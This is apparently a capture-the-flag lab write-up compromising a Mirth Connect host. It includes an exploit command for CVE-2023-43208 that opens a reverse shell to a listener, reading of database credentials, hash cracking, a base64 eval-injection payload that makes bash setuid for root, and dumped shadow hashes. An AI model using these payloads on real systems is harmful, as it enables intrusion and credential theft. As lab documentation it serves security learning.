Basic information

Port scan

22,80,443:

$ nmap -sC -sV -Pn 10.129.241.75
Starting Nmap 7.98 ( https://nmap.org ) at 2026-02-24 20:32 +0900
Nmap scan report for 10.129.241.75
Host is up (0.088s latency).
Not shown: 997 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 9.2p1 Debian 2+deb12u7 (protocol 2.0)
| ssh-hostkey:
| 256 07:eb:d1:b1:61:9a:6f:38:08:e0:1e:3e:5b:61:03:b9 (ECDSA)
|_ 256 fc:d5:7a:ca:8c:4f:c1:bd:c7:2f:3a:ef:e1:5e:99:0f (ED25519)
80/tcp open http Jetty
|_http-title: Mirth Connect Administrator
| http-methods:
|_ Potentially risky methods: TRACE
443/tcp open ssl/http Jetty
|_http-title: Mirth Connect Administrator
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=mirth-connect
| Not valid before: 2025-09-19T12:50:05
|_Not valid after: 2075-09-19T12:50:05
| http-methods:
|_ Potentially risky methods: TRACE
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 44.09 seconds

80/443

Mirth Connect:

A 2021 build, a fairly old version.

CVE-2023-43208 to mirth

A quick search turns up the relevant vulnerability:

The exploit lands a shell as the mirth user:

# port 443 is needed here; port 80 reports Not Vulnerable
python3 mirthconnect_exploit.py -t 10.129.241.75 -p 443 -lh 10.10.14.54 -lp 4444 --exploit

MySQL

Routine file browsing; the database password is in the config file:

mirth@interpreter:/usr/local/mirthconnect/conf$ cat mirth.properties

# keystore
keystore.path = ${dir.appdata}/keystore.jks
keystore.storepass = 5GbU5HGTOOgE
keystore.keypass = tAuJfQeXdnPw
keystore.type = JCEKS

# database credentials
database.username = mirthdb
database.password = MirthPass123!

Then query the database to get the password hash:

mysql -u mirthdb -p'MirthPass123!'

MariaDB [(none)]> show databases;
MariaDB [(none)]> use mc_bdd_prod;

MariaDB [mc_bdd_prod]> select * from PERSON_PASSWORD;

u/+LBBOUnadiyFBsMOoIDPLbUR0rk59kEkPU17itdrVWA/kLMt3w+w==

Hash cracking

The stored value has to be rewritten into a format hashcat accepts:

# hash.txt
sha256:600000:u/+LBBOUnac=:YshQbDDqCAzy21EdK5OfZBJD1Ne4rXa1VgP5CzLd8Ps=

sudo hashcat -m 10900 hash.txt ~/Tools/dict/rockyou.txt

snowflake1

sedric & user flag

Log in as the sedric user with the recovered password:

notif

The process list shows a notif.py running as root:

sedric@interpreter:~$ ps aux
root 3567 0.0 0.7 39872 31708 ? Ss 06:27 0:00 /usr/bin/python3 /usr/local/bin/notif.py

Reading the code shows it is a Flask server that handles POSTed XML:

Note that the input goes straight into the custom template function. Inside that function there is only a simple input check, after which the data is substituted into the template and the result is passed to eval, which allows code injection:

# From Gemini
1. Core vulnerability: remote code execution caused by eval() (Critical)
In the template function, the code uses eval(f"f'''{template}'''").

The problem: although the code tries to filter via the regular expression pattern, that regex includes special characters such as (), {}, =, +, /, and .. These characters are enough to construct valid Python expressions.

Consequence: an attacker can inject Python code through carefully constructed parameters such as first or last. For example, attributes such as __class__ and __globals__ can be used to reach Python's underlying objects and then execute arbitrary system commands (deleting files, spawning a reverse shell, and so on). Never use eval() on user-controllable input.
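The template/eval bug described above, shown as an added example that is not notif.py's own code (the service source is not on this page, so the function bodies and both regexes are a hypothetical reconstruction): the loose allowlist plus eval lets a brace expression in a name run as Python, while string.Template substitution only ever copies values in.

```python
import re
from string import Template

# Assumed allowlist in the spirit of the one the writeup describes: it admits
# (), {}, =, +, /, and ., which is exactly what an f-string expression needs.
LOOSE_PATTERN = re.compile(r"^[\w(){}=+/. ]+$")


def render_vulnerable(first, last):
    """Substitutes the names into the template, then evals it as an f-string."""
    for v in (first, last):
        if not LOOSE_PATTERN.fullmatch(v):
            raise ValueError(f"rejected input: {v!r}")
    template = f"Patient: {first} {last}"
    # Braces inside first/last become f-string expressions at this point and
    # run with the privileges of the service process (root on this box).
    return eval(f"f'''{template}'''")


# Hardened form: an allowlist that admits no expression syntax at all, and
# string.Template, which never evaluates the values it substitutes.
STRICT_NAME = re.compile(r"^[A-Za-z][A-Za-z' -]{0,63}$")
PATIENT_TEMPLATE = Template("Patient: $first $last")


def render_hardened(first, last):
    """Rejects anything that is not a plain name, then substitutes literally."""
    for v in (first, last):
        if not STRICT_NAME.fullmatch(v):
            raise ValueError(f"rejected input: {v!r}")
    return PATIENT_TEMPLATE.substitute(first=first, last=last)


def render_literal(first, last):
    """Substitution alone, without the allowlist: braces stay inert text."""
    return PATIENT_TEMPLATE.substitute(first=first, last=last)


def hardened_rejects(first, last):
    """True if the hardened renderer refuses the input."""
    try:
        render_hardened(first, last)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    print(render_vulnerable("{1+1}", "Doe"))  # expression evaluated: Patient: 2 Doe
    print(render_literal("{1+1}", "Doe"))     # left literal: Patient: {1+1} Doe
    print(hardened_rejects("{1+1}", "Doe"))   # True
```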

Privilege escalation & root flag

So the approach is to build a malicious XML document and use the code injection to run a command:

echo 'import os;os.system("chmod +s /bin/bash");' | base64

aW1wb3J0IG9zO29zLnN5c3RlbSgiY2htb2QgK3MgL2Jpbi9iYXNoIik7Cg==

python3 - << 'EOF'
import http.client
xml = """<patient>
<timestamp>20250101120000</timestamp>
<sender_app>TEST</sender_app>
<id>12345</id>
<firstname>{exec(__import__("base64").b64decode("aW1wb3J0IG9zO29zLnN5c3RlbSgiY2htb2QgK3MgL2Jpbi9iYXNoIik7Cg==").decode())}</firstname>
<lastname>Doe</lastname>
<birth_date>01/01/1990</birth_date>
<gender>M</gender>
</patient>"""
conn = http.client.HTTPConnection("127.0.0.1", 54321)
conn.request("POST", "/addPatient", body=xml, headers={"Content-Type":"application/xml"})
resp = conn.getresponse()
print(resp.status, resp.reason)
print(resp.read().decode())
EOF

shadow

root:$y$j9T$o.VVihLzQteSMxpHLdRkO.$ye7gwugB75H18vxlZ9Yp8uak36M3opreZHoWrWOJto7:20307:0:99999:7:::
sedric:$y$j9T$MMATL11rB9egotaJXLTma0$VZ43M7Rr6.Ls7g8gZwoPCRWIXi6Wjv8j/d8iublq1nB:20495:0:99999:7:::

References